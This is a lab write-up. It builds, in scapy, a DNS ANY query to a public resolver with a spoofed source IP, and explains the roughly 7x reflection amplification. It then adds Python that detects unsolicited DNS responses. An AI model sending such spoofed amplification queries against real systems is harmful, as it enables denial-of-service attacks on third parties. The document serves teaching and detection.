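Prepare two machines
172.28.6.132: sends the packet, spoofing the source IP of the .133 machine
172.28.6.133: receives the packet
Constructing the IP packet
Use the scapy tool to construct the IP packet.
The construction process is as follows: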
$ sudo scapy
>>> i=IP()
>>> i.src="172.28.6.133"
>>> i.dst="8.8.8.8"
>>> u=UDP()
>>> d=DNS()
>>> d.qdcount=1
>>> dr=DNSQR()
>>> dr.qname="baidu.com"
>>> dr.qtype=255
>>> d.qd=dr
>>> r=(i/u/d)
>>> r.display()
###[ IP ]###
version = 4
ihl = None
tos = 0x0
len = None
id = 1
flags =
frag = 0
ttl = 64
proto = udp
chksum = None
src = 172.28.6.133
dst = 8.8.8.8
\options \
###[ UDP ]###
sport = domain
dport = domain
len = None
chksum = None
###[ DNS ]###
id = 0
qr = 0
opcode = QUERY
aa = 0
tc = 0
rd = 1
ra = 0
z = 0
ad = 0
cd = 0
rcode = ok
qdcount = 1
ancount = 0
nscount = 0
arcount = 0
\qd \
|###[ DNS Question Record ]###
| qname = 'baidu.com'
| qtype = ALL
| qclass = IN
an = None
ns = None
ar = None
>>> sr1(r)  # send the packet
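Packet capture
- Sending machine
- Receiving machine
Summary
As shown above, UDP makes it easy to tamper with the source IP, which in turn allows weaknesses in some applications and protocols to be used for amplification. For example, the 69-byte packet sent above arrives at the target machine as 529 bytes, an amplification of more than 7x.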
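Seen from the receiving machine, the effect described in the summary is a DNS response that matches no query the host ever sent. The following is an added example, not part of the original write-up: it parses DNS messages and flags such unsolicited responses. The function names, the example.com lookup, the sample traffic and the 42-byte frame overhead (Ethernet + IPv4 + UDP, no options) are assumptions made for illustration.

```python
import struct

OVERHEAD = 42  # assumed Ethernet(14) + IPv4(20) + UDP(8) bytes per frame
VICTIM, RESOLVER = "172.28.6.133", "8.8.8.8"  # addresses used on the page

def build_dns(txid, qname, qtype, response=False, pad=0):
    """Constructed sample message; `pad` stands in for answer records."""
    name = b"".join(bytes([len(p)]) + p.encode() for p in qname.split("."))
    head = struct.pack("!HHHHHH", txid, 0x8180 if response else 0x0100, 1, 0, 0, 0)
    return head + name + b"\x00" + struct.pack("!HH", qtype, 1) + b"\x00" * pad

def parse_dns(payload):
    """Return (txid, is_response, qname, qtype) for the first question."""
    txid, flags, qdcount = struct.unpack("!HHH", payload[:6])
    if qdcount < 1:
        raise ValueError("no question section")
    pos, labels = 12, []
    while (n := payload[pos]):
        if n & 0xC0:
            raise ValueError("unexpected compression pointer")
        labels.append(payload[pos + 1:pos + 1 + n].decode("ascii"))
        pos += 1 + n
    (qtype,) = struct.unpack("!H", payload[pos + 1:pos + 3])
    return txid, bool(flags & 0x8000), ".".join(labels).lower(), qtype

def unsolicited_responses(packets, local_ip):
    """Flag DNS responses to local_ip that match no query it sent."""
    pending, flagged = set(), []
    for src, dst, payload in packets:
        try:
            txid, is_resp, qname, qtype = parse_dns(payload)
        except (ValueError, IndexError, struct.error):
            continue  # truncated or not DNS: ignore
        if not is_resp and src == local_ip:
            pending.add((dst, txid, qname, qtype))
        elif is_resp and dst == local_ip:
            key = (src, txid, qname, qtype)
            if key not in pending:
                flagged.append((src, qname, qtype, len(payload)))
            pending.discard(key)
    return flagged

# Constructed traffic on the receiving host: one normal lookup, then a reply to an ANY query it never sent.
PACKETS = [
    (VICTIM, RESOLVER, build_dns(0x1234, "example.com", 1)),
    (RESOLVER, VICTIM, build_dns(0x1234, "example.com", 1, True, 16)),
    (RESOLVER, VICTIM, build_dns(0, "baidu.com", 255, True, 460)),
]
FLAGGED = unsolicited_responses(PACKETS, VICTIM)
RATIO = (FLAGGED[0][3] + OVERHEAD) / (len(build_dns(0, "baidu.com", 255)) + OVERHEAD)
```

With the assumed overhead, the constructed query and response reproduce the 69-byte and 529-byte frame sizes quoted in the summary, so RATIO is the same 7x-plus factor.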